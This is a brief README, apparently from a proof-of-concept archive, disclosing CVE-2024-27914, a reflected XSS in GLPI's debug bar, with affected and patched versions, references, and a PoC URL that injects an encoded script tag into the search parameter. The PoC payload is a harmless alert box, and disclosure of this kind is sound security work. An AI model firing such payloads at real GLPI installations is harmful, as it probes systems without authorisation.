# CVE-2024-27914: Reflected XSS in debug mode of GLPI
---
An unauthenticated user can provide a malicious link to a GLPI administrator in order to exploit a reflected XSS vulnerability. The XSS will only trigger if the administrator navigates through the debug bar.
---
- Package - GLPI (https://github.com/glpi-project/glpi)
- Affected Version - >= 10.0.8
- Patched Version - 10.0.13
---
PoC - `http://<host>/glpi/front/search.php?globalsearch=%3Cscript%3Ealert%281%29%3C%2Fscript%3E`
---
Reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27914
- https://nvd.nist.gov/vuln/detail/CVE-2024-27914
[4.0K] /data/pocs/6a8c45ceecd365f9be1331d92688a00f2ff16a7c
└── [ 621] README.md
0 directories, 1 file